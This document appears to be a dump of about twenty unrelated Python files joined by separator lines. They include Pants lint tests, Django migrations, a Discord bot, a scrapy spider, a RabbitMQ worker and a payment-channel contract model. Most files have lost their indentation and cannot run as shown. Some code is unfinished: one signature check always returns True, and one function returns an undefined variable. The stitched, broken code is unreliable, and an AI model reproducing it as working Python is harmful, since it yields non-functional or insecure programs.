*config_files.rules(),
*target_types_rules.rules(),
QueryRule(Partitions, [PydocstyleRequest.PartitionRequest]),
QueryRule(LintResult, [PydocstyleRequest.Batch]),
],
target_types=[PythonSourcesGeneratorTarget],
)
GOOD_FILE = '''
"""Public module docstring is present."""
def fun():
"""Pretty docstring is present."""
pass
'''
BAD_FILE = """
def fun():
'''ugly docstring!'''
pass
"""
def run_pydocstyle(
rule_runner: RuleRunner, targets: list[Target], *, extra_args: list[str] | None = None
) -> Sequence[LintResult]:
rule_runner.set_options(
[
"--backend-packages=pants.backend.python.lint.pydocstyle",
*(extra_args or ()),
],
env_inherit={"PATH", "PYENV_ROOT", "HOME"},
)
partitions = rule_runner.request(
Partitions[PydocstyleFieldSet, InterpreterConstraints],
[
PydocstyleRequest.PartitionRequest(
tuple(PydocstyleFieldSet.create(tgt) for tgt in targets)
)
],
)
results = []
for partition in partitions:
result = rule_runner.request(
LintResult,
[PydocstyleRequest.Batch("", partition.elements, partition.metadata)],
)
results.append(result)
return tuple(results)
def assert_success(
rule_runner: RuleRunner, target: Target, *, extra_args: list[str] | None = None
) -> None:
result = run_pydocstyle(rule_runner, [target], extra_args=extra_args)
assert len(result) == 1
assert result[0].exit_code == 0
@pytest.mark.platform_specific_behavior
@pytest.mark.parametrize(
"major_minor_interpreter",
all_major_minor_python_versions(["CPython>=3.7,<4"]),
)
def test_passing(rule_runner: RuleRunner, major_minor_interpreter: str) -> None:
rule_runner.write_files({"f.py": GOOD_FILE, "BUILD": "python_sources(name='t')"})
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="f.py"))
assert_success(
rule_runner,
tgt,
extra_args=[f"--python-interpreter-constraints=['=={major_minor_interpreter}.*']"],
)
def test_failing(rule_runner: RuleRunner) -> None:
rule_runner.write_files({"f.py": BAD_FILE, "BUILD": "python_sources(name='t')"})
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="f.py"))
result = run_pydocstyle(rule_runner, [tgt])
assert len(result) == 1
assert result[0].exit_code == 1
assert "D100: Missing docstring in public module" in result[0].stdout
def test_multiple_targets(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{"good.py": GOOD_FILE, "bad.py": BAD_FILE, "BUILD": "python_sources(name='t')"}
)
tgts = [
rule_runner.get_target(Address("", target_name="t", relative_file_path="good.py")),
rule_runner.get_target(Address("", target_name="t", relative_file_path="bad.py")),
]
result = run_pydocstyle(rule_runner, tgts)
assert len(result) == 1
assert result[0].exit_code == 1
assert "good.py" not in result[0].stdout
assert "D400: First line should end with a period (not '!')" in result[0].stdout
def test_respects_config_file(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"f.py": BAD_FILE,
"BUILD": "python_sources(name='t')",
".pydocstyle.ini": "[pydocstyle]\nignore = D100,D300,D400,D403",
}
)
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="f.py"))
assert_success(rule_runner, tgt, extra_args=["--pydocstyle-config=.pydocstyle.ini"])
def test_respects_passthrough_args(rule_runner: RuleRunner) -> None:
rule_runner.write_files({"f.py": BAD_FILE, "BUILD": "python_sources(name='t')"})
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="f.py"))
assert_success(
rule_runner, tgt, extra_args=["--pydocstyle-args='--ignore=D100,D300,D400,D403'"]
)
def test_skip(rule_runner: RuleRunner) -> None:
rule_runner.write_files({"f.py": BAD_FILE, "BUILD": "python_sources(name='t')"})
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="f.py"))
result = run_pydocstyle(rule_runner, [tgt], extra_args=["--pydocstyle-skip"])
assert not result
|
#n= 3
n=input()
c=0
while n!=1:
if n%2==0:
n=n/2
else :
n=(3*n+1)/2
c=c+1
print c
|
#!thesis/DB
import mainDB
db = mainDB.db
n = db.nodes
nrs = db.nodesRes
def deleteNode(token):
old_val = n.find_one({'_id': token})
if old_val["role"] == "MASTER":
return "Cannot remove master node"
n.delete_one({'_id': token})
mainDB.removeNodeReplicaSet(old_val)
nrs.delete_one({'_id': token})
return "DONE"
def insertNode(value):
value = mainDB.insertNodeReplicaSet(value)
name = value["name"]
value['_id'] = name
n.insert_one(value)
info = {
'_id': name,
'cpu': -1,
'memory': -1}
nrs.insert_one(info)
return name
def getNodesIP():
class NodeID():
def __init__(self, id, ip):
self.id = id
self.ip = ip
ips = []
for k in n.find():
ips.append(NodeID(k['_id'], k['ip']))
return ips
def getNode(token):
return n.find_one({'_id': token})
def getRes(token):
return nrs.find_one({'_id': token})
def allRes():
return nrs.find()
def getFullNode(token):
node = getNode(token)
res = getRes(token)
node['cpu'] = res['cpu']
node['memory'] = res['memory']
return node
def getNodesID():
results = n.find()
if results:
keys = [str(x["_id"]) for x in results]
else:
keys = []
return keys
def getNodes():
keys = getNodesID()
nodes = []
for k in keys:
r = getFullNode(k)
nodes.append(r)
return nodes
def updateResources(token, value):
"""
token = Node's id
value = {'cpu': 13.7,
'memory': 14507.30}
"""
ins = value
ins["_id"] = token
nrs.find_one_and_replace({'_id': token}, ins)
def updateNode(token, col, value):
try:
tmp = n.find_one({'_id': token})
tmp.pop(col)
tmp[col] = value
n.find_one_and_replace({'_id': token}, tmp)
return tmp
except Exception:
return None
|
from django.db import models
class NetworkElement(models.Model):
ne_name = models.CharField(max_length=100)
ne_type = models.CharField(max_length=100)
ring_name = models.CharField(max_length=100)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-03-20 17:19
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='classroom',
options={'ordering': ('grade', 'name')},
),
migrations.AlterModelOptions(
name='student',
options={'ordering': ('classroom', 'user'), 'verbose_name': 'Student', 'verbose_name_plural': 'Students'},
),
]
|
# -*- coding: utf-8 -*-
from typing import List
class Solution:
def numSpecial(self, mat: List[List[int]]) -> int:
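        # Brute-force check: for every 1 in the matrix, rescan its entire row and
        # column, so the overall cost is O(rows * cols * (rows + cols)).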
result = 0
for i in range(len(mat)):
for j in range(len(mat[0])):
if mat[i][j] == 1 and self.isSpecial(mat, i, j):
result += 1
return result
def isSpecial(self, mat: List[List[int]], i: int, j: int) -> bool:
for k in range(len(mat)):
if i != k and mat[k][j] == 1:
return False
for k in range(len(mat[0])):
if j != k and mat[i][k] == 1:
return False
return True
if __name__ == "__main__":
solution = Solution()
assert 1 == solution.numSpecial(
[
[1, 0, 0],
[0, 0, 1],
[1, 0, 0],
]
)
assert 3 == solution.numSpecial(
[
[1, 0, 0],
[0, 1, 0],
[0, 0, 1],
]
)
assert 2 == solution.numSpecial(
[
[0, 0, 0, 1],
[1, 0, 0, 0],
[0, 1, 1, 0],
[0, 0, 0, 0],
]
)
assert 3 == solution.numSpecial(
[
[0, 0, 0, 0, 0],
[1, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 1, 1],
]
)
|
import unittest
import sys
# sys.path.append('../')
from src.area import Area
class AreaTest(unittest.TestCase):
    def test_square_area_side_positive(self):
        self.assertEqual(Area.square(8), 64)
    def test_square_area_side_negative(self):
        self.assertEqual(Area.square(-5), 0)
    def test_square_area_side_zero(self):
        self.assertEqual(Area.square(0), 0)
    def test_square_area_side_large_number(self):
        self.assertEqual(Area.square(12345678), 152415765279684)
    def test_rectangle_area_valid_numbers(self):
        self.assertEqual(Area.rectangle(5, 6), 30)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-30 14:48
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('challenges', '0001_initial'),
('participants', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ParticipantTeam',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('modified_at', models.DateTimeField(auto_now=True)),
('team_name', models.CharField(max_length=100)),
('challenge', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='challenges.Challenge')),
],
options={
'db_table': 'participant_team',
},
),
migrations.CreateModel(
name='ParticipantTeamMember',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('modified_at', models.DateTimeField(auto_now=True)),
('participant', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='participants.Participant')),
('team', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='participants.ParticipantTeam')),
],
options={
'db_table': 'participant_team_member',
},
),
]
|
class UserData(object):
@staticmethod
def populate(raw):
if not raw or 'user' not in raw:
return None
user = raw['user']
return {'id': str(user['id']),
'name': user['fullname'].encode(encoding='utf-8', errors='ignore') if 'fullname' in user else user['username'].encode(encoding='utf-8', errors='ignore'),
'url': 'http://500px.com/{0}'.format(user['username'].encode(encoding='utf-8', errors='ignore')),
'picture_url': user['userpic_https_url'].encode(encoding='utf-8', errors='ignore') if 'userpic_https_url' in user else user['userpic_url'].encode(encoding='utf-8', errors='ignore'),
'token': raw['access_token'] if 'access_token' in raw else None,
'master': True}
@staticmethod
def is_token_refresh():
return False
|
import unittest
import os
import tempfile
from gmc.core.cache import store
class TestStore(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._dummy_paths = {}
cls.next_path = 0
class Dummy:
def __init__(self, force=False):
self.storage = store('/tmp', force)
def get_name(self, name='dummy'):
n = self.storage[cls.dummy_path(0)]
if n is not None:
return n
self.storage[cls.dummy_path(0)] = name
return name
def set_name(self, name='dummy'):
n = self.storage[cls.dummy_path(0)]
if n is not None:
self.name = n
return n
self.name = name
self.storage[cls.dummy_path(0)] = name
return name
def destroy(self):
os.remove(cls.dummy_path(0))
cls.Dummy = Dummy
def test_getter(self):
dum = self.Dummy()
name = dum.get_name('custom_name')
self.assertEqual(name, 'custom_name')
name = dum.get_name('another_name')
#this shows that old saved copy is used
self.assertEqual(name, 'custom_name')
dum.destroy()
def test_setter(self):
dum = self.Dummy()
dum.set_name('custom_name')
self.assertEqual(dum.name, 'custom_name')
dum.set_name('different_name')
self.assertEqual(dum.name, 'custom_name')
dum.destroy()
def test_force_reloading(self):
dum = self.Dummy(force=True)
name = dum.get_name('custom_name')
self.assertEqual(name, 'custom_name')
name = dum.get_name('another_name')
#this shows that new copy is made
self.assertEqual(name, 'another_name')
dum.destroy()
@classmethod
def dummy_path(cls, name):
cls._dummy_paths[name] = os.path.join('/tmp', 'dummy'+str(name)+'.dat')
return cls._dummy_paths[name]
@classmethod
def tearDownClass(cls):
for path in cls._dummy_paths:
if os.path.isfile(cls._dummy_paths[path]):
os.remove(cls._dummy_paths[path])
|
num1,num2=float(input("num1 = ")),float(input("num2 = "))
print(num1+num2)
|
import discord
from discord.ext import commands
import asyncio
import twitter
from TwitApi import TwitApi
RobId = "154732271742615553"
def post_status(message,postcmd=False):
if len(message.attachments) >= 1:
attaches = []
for item in message.attachments:
attaches.append(item["url"])
try:
if postcmd == False:
print("Touchdown")
pst = TwitApi.PostUpdate(message.content[:250] or " ",media=attaches)
return pst
else:
print("Touchdown")
Content = message.content.split(" ")
pst = TwitApi.PostUpdate((" ".join(Content[1:]))[:250],media=attaches)
return pst
except twitter.TwitterError:
return False
else:
try:
if postcmd == False:
print("Touchdown")
pst = TwitApi.PostUpdate(message.content[:250] or " ")
return pst
else:
print("Touchdown")
Content = message.content.split(" ")
pst = TwitApi.PostUpdate( (" ".join(Content[1:]))[:250] )
return pst
except twitter.TwitterError:
return False
class ClientOwnerOnly:
def __init__(self,client):
self.client = client
@commands.command(pass_context=True)
async def bootup(self,ctx):
message = ctx.message
if message.author.id == RobId:
ContextOn = True
await self.client.say("Successfully booted up.")
else:
await self.client.say("You do not have the permissions to do that, %s!" % (message.author.mention))
@commands.command(pass_context=True)
async def bootdown(self,ctx):
message = ctx.message
if message.author.id == RobId:
ContextOn = False
await self.client.say("Successfully booted down.")
else:
await self.client.say("You do not have the permissions to do that, %s!" % (message.author.mention))
@commands.command(pass_context=True)
async def post(self,ctx):
message = ctx.message
if message is None:
self.client.say("Please enter a valid string message.")
if message.author.id == RobId:
await self.client.say("Posting message..")
post = post_status(message,postcmd=True)
await self.client.say(str(post))
await self.client.say("Posted message to twitter!")
else:
await self.client.say("You do not have the permissions to do that, %s!" % (message.author.mention))
@commands.command(pass_context=True)
async def ppost(self,ctx):
message = ctx.message
if message is None:
self.client.say("Please enter a valid string message.")
if message.author.id == RobId:
content = ctx.message.content.split(" ")
await self.client.say(" ".join(content))
await self.client.say(str(ctx.message.attachments) )
else:
await self.client.say("You do not have the permissions to do that, %s!" % (message.author.mention))
@commands.command(pass_context=True)
async def getmessages(self,ctx):
msgs = self.client.logs_from(self.client.get_channel('488054001795989524'))
print(str(msgs))
@commands.command(pass_context=True)
async def ban(self, ctx, member: discord.Member, days: int = 1):
if member is None:
self.client.say("Please enter a valid member.")
if ctx.message.author.id == RobId:
await self.client.ban(member,days)
await self.client.say("%s has been banned for %s days." % (member.mention,str(days)) )
def setup(client):
client.add_cog(ClientOwnerOnly(client))
|
"""
CCT modelling and optimisation code
Coordinate system translation and rotation
Author: 赵润晓 (Zhao Runxiao)
Date: 2021-05-04
"""
# Append the parent directory to sys.path so that cctpy can be imported
from os import error, path
import sys
sys.path.append(path.dirname(path.abspath(path.dirname(__file__))))
from cctpy import *
# X'Y'Z' local coordinate system: only the origin differs from the global frame;
# the axis directions keep their default values, i.e. the same as the global frame
lcs = LocalCoordinateSystem(location=P3(2,2,1))
# Define a point in the global coordinate system
p_gcs = P3(2,3,3)
# Convert it to the local coordinate system
p_lcs = lcs.point_to_local_coordinate(p_gcs)
# Convert it back to global coordinates
p_gcs_2 = lcs.point_to_global_coordinate(p_lcs)
print(p_gcs)
print(p_lcs)
print(p_gcs == p_gcs_2)
# ------------------------------------------------ #
# X'Y'Z'
lcs_1 = LocalCoordinateSystem(x_direction=P3(
math.cos(BaseUtils.angle_to_radian(30)),
math.sin(BaseUtils.angle_to_radian(30)),
0
))
# X''Y''Z''
lcs_2 = LocalCoordinateSystem(location=P3(8,8,0),
x_direction=P3(
math.cos(BaseUtils.angle_to_radian(30)),
math.sin(BaseUtils.angle_to_radian(30)),
0
))
p = P3(10,16,0)
p1 = lcs_1.point_to_local_coordinate(p)
p2 = lcs_2.point_to_local_coordinate(p)
print(p1) # (16.660254037844386, 8.856406460551021, 0.0)
print(p2) # (5.732050807568877, 5.92820323027551, 0.0)
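# The conversion above is local = R^T * (p - origin). For lcs_2, for example,
# p - (8, 8, 0) = (2, 8, 0), so x'' = 2*cos30 + 8*sin30 ≈ 5.732 and
# y'' = -2*sin30 + 8*cos30 ≈ 5.928, matching the printed values (this assumes
# the default y axis is the in-plane direction perpendicular to x_direction).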
|
from datetime import datetime
import re
import scrapy
URL_TEMPLATE = 'https://www.kickstarter.com/discover/advanced?term=board+game&sort=popular&page='
PAGES = 1
def replace_last(source_string, replace_what, replace_with):
head, _sep, tail = source_string.rpartition(replace_what)
return head + replace_with + tail
def convert_date(input):
""" Converts date string like 2017-04-03T16:24:58-04:00 to something Excel-friendly, like 2017/04/04 """
parsed = datetime.strptime(replace_last(input, ":", ""), "%Y-%m-%dT%H:%M:%S%z")
return datetime.strftime(parsed, "%Y/%m/%d")
class KickstarterSpider(scrapy.Spider):
name = "kickstarter"
start_urls = [URL_TEMPLATE + str(page) for page in range(1, PAGES + 1)]
def parse(self, response):
projects = response.css('li.project')
print("INFO: Project count: " + str(len(projects)))
for project in projects:
project_link_anchor = project.css('h6.project-title > a')
project_link = project_link_anchor.css('::attr(href)').extract_first()
if project_link:
yield scrapy.Request(response.urljoin(project_link),
callback=self.parse_project)
break
# else:
# # Fallback to a different format
# project_link2 = project.css('.project-profile-title a::attr(href)').extract_first()
#
# if project_link2:
# yield scrapy.Request(response.urljoin(project_link2),
# callback=self.parse_project)
# else:
# print("ERROR: Could not link project")
def parse_project(self, response):
title = response.css('meta[property="og:title"]::attr(content)').extract_first()
pledged_data_element = response.css('#pledged')
goal = pledged_data_element.css('::attr(data-goal)').extract_first()
pledged = pledged_data_element.css('::attr(data-pledged)').extract_first()
backers = response.css('#backers_count::attr(data-backers-count)').extract_first()
previously_created = response.css('.mb2-md a.remote_modal_dialog::text').extract_first()
previously_created_count = 0
if previously_created == "First created":
previously_created_count = 1
elif previously_created:
match = re.search(r"(\d+) created", previously_created)
if match:
previously_created_count = int(match.group(1))
comments = response.css('.project-nav__link--comments .count data::attr(data-value)').extract_first()
# Start date is stored on the /updates page, so collect the remaining fields
# here and let parse_project_updates fill in the start date before yielding.
end_date = response.css('.NS_projects__funding_bar .js-campaign-state__failed time::attr(datetime)').extract_first()
item = {
'title': title,
'goal': goal,
'backers': backers,
'pledged': pledged,
'end_date': convert_date(end_date) if end_date else "",
'previously_created': previously_created_count,
'comments': comments,
}
updates_link = response.css('a.project-nav__link--updates::attr(href)').extract_first()
updates_page_request = scrapy.Request(response.urljoin(updates_link), callback=self.parse_project_updates)
updates_page_request.meta['item'] = item
yield updates_page_request
def parse_project_updates(self, response):
start_date = response.css('.timeline__divider--launched time::attr(datetime)').extract_first()
item = response.meta['item']
item['start_date'] = convert_date(start_date) if start_date else ""
return item
|
import math
def isPrime(n):
# Returns True if n is prime, False otherwise.
# 0, 1 and 2 are handled explicitly; trial division runs up to sqrt(n).
prime = True
check = math.sqrt(n)
if n == 0:
return False
if n == 1:
return False
if n == 2:
return True
for i in range(2,math.ceil(check)+1):
if n % i == 0:
prime = False
break
return prime
def indexInt(n):
# time complexity O(n)
index = [int(i) for i in str(n)]
return index
def primeDigitSums(n):
# Also expensive: iterates over every n-digit number and keeps those where
# every contiguous window of 3, 4 or 5 digits has a prime digit sum.
start = 10 ** (n - 1)
end = 10 ** n
count = 0
number_list = []
for item in range(start, end):
if checkSet(item):
number_list.append(item)
count += 1
return number_list
def checkSet(n: int):
# Builds every contiguous digit window of length up to 5 and requires each
# window of length 3, 4 or 5 to have a prime digit sum.
first_list = indexInt(n)
def checkSub(n: list, length: int, end: int):
new_list = []
new_length = length + 1
satisfies = True
if length > end-1:
return satisfies
for numb in range(len(n)):
if numb + 1 > len(n)-1:
break
prev = n[numb] if type(n[numb]) == list else [n[numb]]
new_numb = prev + [first_list[numb+ length]]
if len(new_numb) in [3,4,5]:
if not isPrime(sum(new_numb)):
satisfies = False
break
new_list.append(new_numb)
return checkSub(new_list, length + 1, end) and satisfies
return checkSub(first_list, 1, 5)
if __name__ == "__main__":
pds = primeDigitSums(6)
print(pds)
print(len(pds))
|
#!/usr/bin/env python
'''
RabbitMQ receiver. Jobs are retreived as messages and converted into
python calls.
'''
activate_this_file = "../venv/bin/activate_this.py"
execfile(activate_this_file, dict(__file__=activate_this_file))
from viewsheds import grassCommonViewpoints
from srtmsql import pointQuery , makeTransparent
import pika , json , configparser
config = configparser.ConfigParser()
config.read('../config.ini')
options_ucmi = config._sections['ucmi.py']
viewshedDir = '../' + options_ucmi['viewsheddir']
# Connecting to RabbitMQ server
connection = pika.BlockingConnection(pika.ConnectionParameters(
host='localhost'))
channel = connection.channel()
channel.queue_delete(queue='task_queue')
channel.queue_declare(queue='task_queue')
def callback(ch, method, properties, body):
form = json.loads(body)[1]
fnction = json.loads(body)[0]
id = json.loads(body)[2]
altitude = float(form['altitude'])
greaterthan = (form['greaterthan'] == 'greaterthan')
viewNum = int(form['viewNum'])
dateStamp = form['dateStamp']
if fnction == 'grassCommonViewpoints':
grassCommonViewpoints(viewNum , greaterthan , altitude , id , dateStamp)
makeTransparent(id)
elif fnction == 'pointQuery':
lat = form['lat']
lng = form['lng']
pointNum = int(form['size'])
firstMarker = (pointNum == 1)
pointQuery(lat , lng , pointNum, firstMarker , viewNum , greaterthan , altitude , id , dateStamp)
# Process is completed, create empty done file
print(" [x] Done: %r" % body)
f = open('/'.join([viewshedDir, id, dateStamp + '.done']), 'w')
f.close()
channel.basic_consume(callback,
queue='task_queue')
print(' [*] Waiting for messages. To exit press CTRL+C')
channel.start_consuming()
|
from uc.itm import UCWrappedFunctionality
from uc.utils import wait_for
import logging
log = logging.getLogger(__name__)
class Contract(UCWrappedFunctionality):
def __init__(self, k, bits, sid, pid, channels, pump, poly, importargs):
self.ssid = sid[0]
self.n = sid[1]
self.delta = sid[2]
self.settlement = self.delta * 2 # the challenge period
self.deadline = -1
self.nonce = -1
self.balances = sid[3]
self.flag = 'OPEN'
## Following is for general case, above is for channel's already open
# self.balances = [0] * self.n
# self.flag = 'CLOSED' # {'CLOSED', 'OPEN', 'CHALLANGE'}
# # 'CLOSED': channel closed
# # 'OPEN': channel open
# # 'CHALLANGE': enter into challenge period
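# Channel lifecycle implemented below: init_channel opens the channel;
# close_channel either closes immediately (when the submitted state carries the
# counterparty's signature) or enters a challenge period of `settlement` rounds
# (sender's signature only); recv_challenge accepts a fully signed state with a
# newer nonce during that period and then closes the channel.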
UCWrappedFunctionality.__init__(self, k, bits, sid, pid, channels, poly, pump, importargs)
def _check_sig(self, party, sig, state):
# TODO: check if `party` sign the `state` with signature `sig`
return True  # placeholder: accept every signature until verification is implemented
def _current_time(self):
# TODO: return current round
return current_round
# smart contract logic
def close_channel(self, data, imp):
_from = data['sender']
_state = data['state']
_sig = data['sig']
assert self.flag == 'OPEN'
for p in range(self.n):
if p != _from:
isHonest = self._check_sig(p, _sig[p], _state)
if isHonest:
# means also have receiver's signature
# Q: should the following action be scheduled for a delay?
self.flag = 'CLOSED'
msg = {
'msg': 'close_channel',
'imp': imp,
'data': data
}
self.wrapper_contract(-1, msg, imp) # Broadcast
leaked_msg = ('close', (_from))
self.leak(leaked_msg, 0)
else:
# means only sender's signature
# Q: should the following action be scheduled for a delay?
self.flag = 'CHALLANGE'
self.deadline = self._current_time() + self.settlement
msg = {
'msg': 'challenge',
'imp': imp,
'data': data
}
self.wrapper_contract(-1, msg, imp) # Broadcast
leaked_msg = ('challenge', (_from))
self.leak(leaked_msg, 0)
# smart contract logic
def init_channel(self, data, imp):
_from = data['sender']
_amt = data['amount']
# Q: should the following action be scheduled for a delay?
self.flag = 'OPEN'
msg = {
'msg': 'init_channel',
'imp': imp,
'data': data
}
self.wrapper_contract(-1, msg, imp) # Broadcast
leaked_msg = ('init', (_from, _amt))
self.leak(leaked_msg, 0)
# smart contract logic
# Q: should the following action be scheduled for a delay?
def recv_challenge(self, data, imp):
_from = data['sender']
_state = data['state']
_sig = data['sig']
assert self.flag == 'CHALLANGE'
assert self._current_time() <= self.deadline # ensure not due
assert _state['nonce'] >= self.nonce
for p in range(self.n):
assert self._check_sig(p, _sig[p], _state)
self.nonce = _state['nonce']
self.balances = _state['balances']
self.flag = 'CLOSED'
msg = {
'msg': 'close_channel',
'imp': imp,
'data': data
}
self.wrapper_contract(-1, msg, imp) # Broadcast
leaked_msg = ('challenge', (_from, _state, _sig))
self.leak(leaked_msg, 0)
# offchain synchronous channel
# used for communication between parties, relaying `msg`
def offchain_channel(self, _from, _to, msg, imp):
codeblock = (
'schedule',
self.__send2p,
(_to, msg, imp),
1
)
self.write('f2w', codeblock, imp)
m = wait_for(self.channels['w2f']).msg
assert m == ('OK',)
leaked_msg = ('send', (_from, _to, msg))
self.leak(leaked_msg, 0)
# onchain synchronous channel
# used to simulate onchain mining txs
def wrapper_contract(self, sender, msg, imp):
if sender > 0: # sender is parties
codeblock = (
'schedule',
self.__send2c,
(msg, imp),
self.delta
)
self.write('f2w', codeblock, imp)
m = wait_for(self.channels['w2f']).msg
assert m == ('OK',)
elif sender == -1: # sender is contract, and this is broadcast
for _to in range(self.n):
codeblock = (
'schedule',
self.__send2p,
(_to, msg, imp),
1
)
self.write('f2w', codeblock, imp)
m = wait_for(self.channels['w2f']).msg
assert m == ('OK',)
else:
return
#Q: do we leak message here? or leak in the actual codeblock execution
#Q: how do we handle `imp` tokens?
def __send2p(self, i, msg, imp):
self.write('f2p', (i, msg), imp)
def __send2c(self, msg, imp):
self.write('w2f', (msg), imp)
# p2f handler
def party_msg(self, msg):
log.debug('Contract/Receive msg from P in real world: {}'.format(msg))
command = msg['msg']
imp = msg['imp']
data = msg['data']
sender = data['sender']
if command == 'send': # united interface with synchronous channel
# normal offchain payment
receiver = data['receiver']
self.offchain_channel(sender, receiver, msg, imp)
# === ^ offchain operations === v onchain operations
elif command == 'challenge' or \
command == 'init' or \
command == 'close':
self.wrapper_contract(sender, msg, imp)
# elif command == 'deposit':
# pass
# elif command == 'withdraw':
# pass
else:
self.pump.write("dump")
def adv_msg(self, d):
self.pump.write("dump")
def env_msg(self, msg):
self.pump.write("dump")
def wrapper_msg(self, msg):
log.debug('Contract/Receive msg from Wrapper: {}'.format(msg))
command = msg['msg']
imp = msg['imp']
data = msg['data']
if command == 'challenge':
# entering into challenge, receive challenge from P_{receiver}
self.recv_challenge(data, imp)
elif command == 'init':
self.init_channel(data, imp)
elif command == 'close':
self.close_channel(data, imp)
# elif command == 'deposit':
# pass
# elif command == 'withdraw':
# pass
else:
self.pump.write("dump")
|
#!/usr/bin/env python
#
#
#
"""
Froomi web media search engine, and pseudo streaming provider
Copyright (C) 2009 David Busby http://saiweb.co.uk
"""
import ConfigParser,sys,os
from time import time
class Froomi:
def __init__(self):
self.debug = False
self.confd = ''
#===============================================================================
# This function sets up the module import paths, and attempts to import the mods
#===============================================================================
def loadmods():
verbose('loadmods()')
path = '%s/modules' % (sys.path[0])
i = 0
for mod in os.listdir(path):
path = '%s/modules/%s' % (sys.path[0],mod)
if mod != '.svn':
if os.path.isdir(path):
sys.path.append(path)
try:
__import__(mod)
except ImportError,e:
print 'Failed to import module',mod,'Error:',e
sys.exit(1)
else:
i+=1
verbose('Loaded %s' % (mod))
verbose('loadmods() complete %s module(s) loaded' % (i))
#===============================================================================
# verbose function
#===============================================================================
def verbose(msg):
if opts.verbose:
print '%s: %s' % (time(), msg)
#===============================================================================
# opts data subclass, used as a 'shared' store between threads
#===============================================================================
class opts:
threads = []
exit = False
verbose = True
if __name__ == "__main__":
loadmods()
main()
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from dataclasses import dataclass
from typing import Any, Iterator
from pants.option.parser import Parser
from pants.util.frozendict import FrozenDict
from pants.util.strutil import softwrap
ALL_DEFAULT_REGISTRIES = "<all default registries>"
class DockerRegistryError(ValueError):
pass
class DockerRegistryOptionsNotFoundError(DockerRegistryError):
def __init__(self, message):
super().__init__(
f"{message}\n\n"
"Use the [docker].registries configuration option to define custom registries."
)
class DockerRegistryAddressCollisionError(DockerRegistryError):
def __init__(self, first, second):
message = softwrap(
f"""
Duplicated docker registry address for aliases: {first.alias}, {second.alias}.
Each registry `address` in `[docker].registries` must be unique.
"""
)
super().__init__(message)
@dataclass(frozen=True)
class DockerRegistryOptions:
address: str
alias: str = ""
default: bool = False
skip_push: bool = False
extra_image_tags: tuple[str, ...] = ()
repository: str | None = None
use_local_alias: bool = False
@classmethod
def from_dict(cls, alias: str, d: dict[str, Any]) -> DockerRegistryOptions:
return cls(
alias=alias,
address=d["address"],
default=Parser.ensure_bool(d.get("default", alias == "default")),
skip_push=Parser.ensure_bool(d.get("skip_push", DockerRegistryOptions.skip_push)),
extra_image_tags=tuple(
d.get("extra_image_tags", DockerRegistryOptions.extra_image_tags)
),
repository=Parser.to_value_type(d.get("repository"), str, None),
use_local_alias=Parser.ensure_bool(d.get("use_local_alias", False)),
)
def register(self, registries: dict[str, DockerRegistryOptions]) -> None:
if self.address in registries:
collision = registries[self.address]
raise DockerRegistryAddressCollisionError(collision, self)
registries[self.address] = self
if self.alias:
registries[f"@{self.alias}"] = self
@dataclass(frozen=True)
class DockerRegistries:
default: tuple[DockerRegistryOptions, ...]
registries: FrozenDict[str, DockerRegistryOptions]
@classmethod
def from_dict(cls, d: dict[str, Any]) -> DockerRegistries:
registries: dict[str, DockerRegistryOptions] = {}
for alias, options in d.items():
DockerRegistryOptions.from_dict(alias, options).register(registries)
return cls(
default=tuple(
sorted({r for r in registries.values() if r.default}, key=lambda r: r.address)
),
registries=FrozenDict(registries),
)
def get(self, *aliases_or_addresses: str) -> Iterator[DockerRegistryOptions]:
for alias_or_address in aliases_or_addresses:
if alias_or_address in self.registries:
# Get configured registry by "@alias" or "address".
yield self.registries[alias_or_address]
elif alias_or_address.startswith("@"):
raise DockerRegistryOptionsNotFoundError(
f"There is no Docker registry configured with alias: {alias_or_address[1:]}."
)
elif alias_or_address == ALL_DEFAULT_REGISTRIES:
yield from self.default
else:
# Assume an explicit address from the BUILD file.
yield DockerRegistryOptions(address=alias_or_address)
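# A minimal usage sketch (the alias and addresses below are made up, not actual
# Pants configuration):
#
#   registries = DockerRegistries.from_dict(
#       {"private": {"address": "registry.example.com", "default": True}}
#   )
#   list(registries.get("@private"))               # resolved by alias
#   list(registries.get(ALL_DEFAULT_REGISTRIES))   # every registry marked default
#   list(registries.get("docker.io/someuser"))     # ad-hoc options for an explicit address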
|